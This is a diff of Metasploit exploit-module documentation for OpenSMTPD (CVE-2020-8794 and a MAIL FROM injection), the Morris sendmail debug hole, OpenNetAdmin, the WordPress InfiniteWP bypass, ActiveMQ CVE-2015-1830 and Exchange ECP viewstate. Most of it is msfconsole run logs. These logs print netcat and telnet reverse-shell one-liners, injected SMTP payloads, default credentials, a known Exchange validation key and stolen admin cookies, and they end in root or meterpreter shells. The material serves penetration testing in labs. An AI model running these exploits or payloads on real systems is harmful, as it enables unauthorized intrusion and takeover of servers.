+2. Install the system
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD < 6.6.4 (automatic grammar selection)
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**SESSION**
+
+Set this to a valid session ID on an OpenBSD target.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing
+
+Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
+session => 1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.6.0 is using new grammar
+[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:37747 connected
+[*] Exploiting new OpenSMTPD grammar for a root shell
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+dispatcher: local_mail
+type: mda
+mda-user: root
+mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0
+
+[*] Disconnecting client 172.16.249.137:37747
+[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+^Z
+Background session 3? [y/N]  y
+```
+
+### OpenSMTPD 6.0.4 on OpenBSD 6.3
+
+```
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
+session => 2
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.0.4 is using old grammar
+[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.138:10203 connected
+[*] Exploiting old OpenSMTPD grammar for a nobody shell
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+type: mda
+mda-method: mda
+mda-usertable: <getpwnam>
+mda-user: nobody
+mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0
+
+[*] Disconnecting client 172.16.249.138:10203
+[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
+[*] Server stopped.
+
+id
+uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+uname -a
+OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
+```
@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits `sendmail`'s well-known historical debug mode to
 escape to a shell and execute commands in the SMTP `RCPT TO` command.
@@ -6,7 +8,7 @@ escape to a shell and execute commands in the SMTP `RCPT TO` command.
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -16,7 +18,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -24,6 +26,10 @@ Id  Name
 0   @(#)version.c       5.51 (Berkeley) 5/2/86
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -33,62 +39,66 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a Unix command payload. Currently only `cmd/unix/reverse`
+Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
 and `cmd/unix/generic` are supported.

-## Usage
+## Scenarios
+
+### `sendmail` 5.51 on 4.3BSD

 ```
-msf5 exploit(unix/smtp/morris_sendmail_debug) > options
+msf5 > use exploit/unix/smtp/morris_sendmail_debug
+msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing

 Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   25               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)version.c       5.51 (Berkeley) 5/2/86
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(unix/smtp/morris_sendmail_debug) > run

-[*] Started reverse TCP double handler on 192.168.1.5:4444
+[*] Started reverse TCP double handler on 192.168.56.1:4444
 [*] 127.0.0.1:25 - Connecting to sendmail
 [*] 127.0.0.1:25 - Enabling debug mode and sending exploit
+[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
 [*] 127.0.0.1:25 - Sending: DEBUG
-[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
+[*] 127.0.0.1:25 - Expecting: /200 Debug set/
+[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
+[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
 [*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
+[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
 [*] 127.0.0.1:25 - Sending: DATA
+[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
 [*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
 [*] 127.0.0.1:25 - Sending: export PATH
-[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
+[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
 [*] 127.0.0.1:25 - Sending: .
+[*] 127.0.0.1:25 - Expecting: /250 Ok/
 [*] 127.0.0.1:25 - Sending: QUIT
+[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
-[*] Command: echo zqhqKJD7trW0E0Lp;
+[*] Command: echo ISj759F8jEik4HAW;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
-[*] Reading from socket B
-[*] B: "zqhqKJD7trW0E0Lp\r\n"
+[*] Reading from socket A
+[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
 [*] Matching...
-[*] A is input...
-[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
+[*] B is input...
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
 [!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
 [!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a command injection in the `MAIL FROM` field during
+SMTP interaction with OpenSMTPD to execute a command as the root user.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
+2. Install the system, noting the domain name (defaults to `foo.localdomain` in VMware)
+3. Configure the following settings in `/etc/mail/smtpd.conf`:
+  * `listen on all`
+  * `match from any for domain "foo.localdomain" action "local_mail"`
+4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
+5. Execute `ifconfig` and look for an appropriate target IP
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD < 6.6.1
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**RCPT_TO**
+
+Set this to a valid mail recipient. The default is `root`.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing
+
+Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137
+rhosts => 172.16.249.137
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
+
+[+] mkfifo /tmp/twkfr; nc 172.16.249.1 4444 0</tmp/twkfr | /bin/sh >/tmp/twkfr 2>&1; rm /tmp/twkfr
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] 172.16.249.137:25 - Executing automatic check (disable AutoCheck to override)
+[!] 172.16.249.137:25 - The service is running, but could not be validated.
+[*] 172.16.249.137:25 - Connecting to OpenSMTPD
+[*] 172.16.249.137:25 - Saying hello and sending exploit
+[*] 172.16.249.137:25 - Expecting: /220.*OpenSMTPD/
+[+] 172.16.249.137:25 - Received: 220 foo.localdomain ESMTP OpenSMTPD
+[*] 172.16.249.137:25 - Sending: HELO JijrF2eskbXFfdlaV
+[*] 172.16.249.137:25 - Expecting: /250.*pleased to meet you/
+[+] 172.16.249.137:25 - Received:
+250 foo.localdomain Hello JijrF2eskbXFfdlaV [172.16.249.1], pleased to meet you
+[*] 172.16.249.137:25 - Sending: MAIL FROM:<;for W in a n 0 9 g D 7 N 7 B K R i u V;do read;done;sh;exit 0;>
+[*] 172.16.249.137:25 - Expecting: /250.*Ok/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 Ok
+[*] 172.16.249.137:25 - Sending: RCPT TO:<root>
+[*] 172.16.249.137:25 - Expecting: /250.*Recipient ok/
+[+] 172.16.249.137:25 - Received:
+250 2.1.5 Destination address valid: Recipient ok
+[*] 172.16.249.137:25 - Sending: DATA
+[*] 172.16.249.137:25 - Expecting: /354 Enter mail.*itself/
+[+] 172.16.249.137:25 - Received:
+354 Enter mail, end with "." on a line by itself
+[*] 172.16.249.137:25 - Sending:
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+mkfifo /tmp/rsnzh; nc 172.16.249.1 4444 0</tmp/rsnzh | /bin/sh >/tmp/rsnzh 2>&1; rm /tmp/rsnzh
+[*] 172.16.249.137:25 - Sending: .
+[*] 172.16.249.137:25 - Expecting: /250.*Message accepted for delivery/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 5bd4f87d Message accepted for delivery
+[*] 172.16.249.137:25 - Sending: QUIT
+[*] 172.16.249.137:25 - Expecting: /221.*Bye/
+[+] 172.16.249.137:25 - Received:
+221 2.0.0 Bye
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:28550) at 2020-02-28 10:28:14 -0600
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+```
@@ -0,0 +1,52 @@
+## Description
+
+OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
+This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the `tooltips.inc.php` component, due to the insecure usage of the `shell_exec()` PHP function.
+
+## Vulnerable Application
+
+This module has been tested with [OpenNetAdmin 18.1.1](https://github.com/opennetadmin/ona/releases/tag/v18.1.1)
+
+## Setup
+
+https://github.com/opennetadmin/ona/wiki/Install
+
+## Verification
+
+Launch metasploit and set the appropiate options:
+>
+> * [ ]  Start `msfconsole`
+> * [ ]  `use exploit/unix/webapp/opennetadmin_ping_cmd_injection`
+> * [ ]  `set RHOSTS <rhosts>`
+> * [ ]  `set LHOST <lhost>`
+> * [ ]  `set VHOST <hostname>`
+> * [ ]  `exploit`
+
+## Options
+
+**VHOST**
+
+The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.
+
+## Scenarios
+
+ Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64
+
+```
+msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
+msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152
+RHOSTS => 172.16.172.152
+msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com
+VHOST => example.com
+msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1
+LHOST => 172.16.172.1
+msf5 exploit(opennetadmin_ping_cmd_injection) > exploit
+[*] Started reverse TCP handler on 172.16.172.1:4444
+[*] Exploiting...
+[*] Sending stage (3021284 bytes) to 172.16.172.152
+[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.152:38590) at 2019-12-10 02:38:52 +0300
+[*] Sending stage (3021284 bytes) to 172.16.172.152
+[*] Command Stager progress - 100.12% done (810/809 bytes)
+
+meterpreter >
+```
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authentication bypass in the WordPress
+InfiniteWP Client plugin to log in as an administrator and execute
+arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.
+
+The module will attempt to retrieve the original `PLUGIN_FILE` contents
+and restore them after payload execution. If `VerifyContents` is set,
+which is the default setting, the module will check to see if the
+restored contents match the original.
+
+Note that a valid administrator username is required for this module.
+
+WordPress >= 4.9 is currently not supported due to a breaking WordPress
+API change. Tested against 4.8.3.
+
+### Setup
+
+1. Install WordPress 4.8.3 or older
+2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
+3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   InfiniteWP Client < 1.9.4.5
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**USERNAME**
+
+Set this to a known, valid administrator username. Authentication will
+be bypassed for this user.
+
+**PLUGIN_FILE**
+
+Set this to a plugin file to insert the payload into, relative to the
+plugins directory, which is normally `/wp-content/plugins`. The file
+must exist and be writable by the web user. It will be overwritten and
+later restored.
+
+**VerifyContents**
+
+Verify that the restored contents of `PLUGIN_FILE` match the original.
+This is the default setting.
+
+## Scenarios
+
+### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3
+
+```
+msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+
+Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
+rport => 8000
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] WordPress 4.8.3 is a supported target
+[*] Found version 1.9.4.4 in the custom file
+[+] The target appears to be vulnerable.
+[*] Bypassing auth for admin at http://127.0.0.1:8000/
+[+] Successfully obtained cookie for admin
+[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
+[+] Successfully logged in as admin
+[*] Retrieving original contents of /wp-content/plugins/index.php
+[+] Successfully retrieved original contents of /wp-content/plugins/index.php
+[*] Contents:
+<?php
+// Silence is golden.
+[*] Overwriting /wp-content/plugins/index.php with payload
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Successfully overwrote /wp-content/plugins/index.php with payload
+[*] Requesting payload at /wp-content/plugins/index.php
+[*] Restoring original contents of /wp-content/plugins/index.php
+[*] Sending stage (38288 bytes) to 192.168.56.1
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Current contents of /wp-content/plugins/index.php match original!
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : c7f8fbe7b083
+OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
@@ -1,6 +1,6 @@
 ## Introduction

-The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function.
 This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
 on the target.

@@ -43,7 +43,7 @@ on the target.
  [*] Using URL: http://192.168.146.1:8080/default.hta
  [*] Server started.
  ```
-  
+
  Once the victim opens the file and clicks 'Enable Content' a session should spawn:

  ```
@@ -0,0 +1,70 @@
+## Introduction
+
+A directory traversal vulnerability was discovered in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows. The vulnerability, tracked as CVE-2015-1830, allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.
+
+Because vulnerable servers allow for directory traversal, they will accept HTTP PUT requests for `/fileserver/..\\admin\\` and process these as requests for `/admin/`. For the PUT request to succeed, credentials need to be provided.
+
+This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a target via an HTTP PUT requests for `/fileserver/..\\admin\\` using the default credentials `admin:admin` (or any other credentials provided by the user). It then issues an HTTP GET request to `/admin/<payload>.jsp` on the target in order to trigger the payload and obtain a shell. The module has been succesfully tested against ActiveMQ 5.11.1 on a Windows 7 machine.
+
+## Verification Steps
+
+1. Start msfconsole.
+2. Do: `use exploit/windows/http/apache_activemq_traversal_upload`.
+3. Do: `set RHOSTS [IP]`. This option is used to set the IP address of the remote system running Apache ActiveMQ.
+4. Do: `set PAYLOAD [payload]`. This option can be used to set the payload to use against the target. The default payload is `java/jsp_shell_reverse_tcp`.
+5. Do: `set LHOST [IP]`. This option is used to set the IP address of the local machine the payload should establish a connection with.
+6. Do: `exploit`.
+
+## Options
+
+1.  `PASSWORD`. The default setting is `admin`, which is the default password for the ActiveMQ administrator account.
+2.  `PATH`. This option is the traversal path. `/fileserver/..\admin\` by default.
+3.  `USERNAME`. The default setting is `admin`, which is the default ActiveMQ administrator account.
+
+## Scenarios
+
+```
+msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options
+
+Module options (exploit/windows/http/apache_activemq_traversal_upload):
+
+   Name       Current Setting        Required  Description
+   ----       ---------------        --------  -----------
+   PASSWORD   admin                  yes       Password to authenticate with
+   PATH       /fileserver/..\admin\  yes       Traversal path
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8161                   yes       The target port (TCP)
+   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                      yes       The base path to the web application
+   USERNAME   admin                  yes       Username to authenticate with
+   VHOST                             no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.1:4444 
+[*] Uploading payload...
+[*] Payload sent. Attempting to execute the payload.
+[*] Payload executed!
+[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
+```
+
+## References
+
+1. <https://www.cvedetails.com/cve/CVE-2015-1830/>
+2. <https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt>
@@ -1,9 +1,9 @@
 ## Vulnerable Application

  Tested on Windows 7 x64 and x86.
-  
+
  Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.
-  
+
  [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe)

 ## Verification Steps
@@ -20,9 +20,9 @@
  **RHOST**

  IP address of the remote host running the server.
-  
+
  **RPORT**
-  
+
  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.

 ## Scenarios
@@ -52,4 +52,4 @@ Microsoft Windows [Version 6.1.7600]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 C:\Windows\system32>
-  ```
+  ```
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+This module exploits a .NET serialization vulnerability in the Exchange Control
+Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not
+randomizing the keys on a per-installation basis resulting in them using the
+same validationKey and decryptionKey values. With knowledge of these, values an
+attacker can craft a special viewstate to cause an OS command to be executed by
+NT_AUTHORITY\SYSTEM using .NET deserialization.
+
+The default ViewState validation key is: `cb2721abdaf8e9dc516d621d8b8bf13a2c9e8689a25303bf`.
+
+This module requires the user to authenticate to Exchange. At a minimum the user
+must be a member of the `Domain Users` group and have a mailbox configured on
+the Exchange server.
+
+The crafted ViewState must be submitted to the server in a GET request (POST
+requests will not work) which introduces a size restriction on the contents. Due
+to this, OS commands are limited to a length of approximately 450 which accounts
+for the overhead of the serialization data. The OS command must also be XML
+encoded which increases the size as well. The .NET deserialization used is the
+"TextFormattingRunProperties" chain from the [ysoserial.net][1] project.
+
+## Verification Steps
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/windows/http/exchange_ecp_viewstate`
+  1. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
+  4. Do: `run`
+  5. You should get a shell.
+
+### Version and OS
+
+  For example:
+
+    msf5 > use exploit/windows/http/exchange_ecp_viewstate
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
+    RHOSTS => 192.168.159.129
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
+    USERNAME => msflab.local\jdoe
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
+    PASSWORD => Password1
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
+    TARGET => 1
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+    PAYLOAD => windows/x64/meterpreter/reverse_tcp
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
+    LHOST => 192.168.159.128
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.159.128:4444 
+    [*] Command Stager progress -   3.61% done (449/12424 bytes)
+    [*] Command Stager progress -   7.23% done (898/12424 bytes)
+    [*] Command Stager progress -  10.84% done (1347/12424 bytes)
+    [*] Command Stager progress -  14.46% done (1796/12424 bytes)
+    [*] Command Stager progress -  18.07% done (2245/12424 bytes)
+    [*] Command Stager progress -  21.68% done (2694/12424 bytes)
+    [*] Command Stager progress -  25.30% done (3143/12424 bytes)
+    [*] Command Stager progress -  28.91% done (3592/12424 bytes)
+    [*] Command Stager progress -  32.53% done (4041/12424 bytes)
+    [*] Command Stager progress -  36.14% done (4490/12424 bytes)
+    [*] Command Stager progress -  39.75% done (4939/12424 bytes)
+    [*] Command Stager progress -  43.37% done (5388/12424 bytes)
+    [*] Command Stager progress -  46.98% done (5837/12424 bytes)
+    [*] Command Stager progress -  50.60% done (6286/12424 bytes)
+    [*] Command Stager progress -  54.21% done (6735/12424 bytes)
+    [*] Command Stager progress -  57.82% done (7184/12424 bytes)
+    [*] Command Stager progress -  61.44% done (7633/12424 bytes)
+    [*] Command Stager progress -  65.05% done (8082/12424 bytes)
+    [*] Command Stager progress -  68.67% done (8531/12424 bytes)
+    [*] Command Stager progress -  72.28% done (8980/12424 bytes)
+    [*] Command Stager progress -  75.89% done (9429/12424 bytes)
+    [*] Command Stager progress -  79.51% done (9878/12424 bytes)
+    [*] Command Stager progress -  82.74% done (10279/12424 bytes)
+    [*] Command Stager progress -  86.15% done (10703/12424 bytes)
+    [*] Command Stager progress -  89.43% done (11111/12424 bytes)
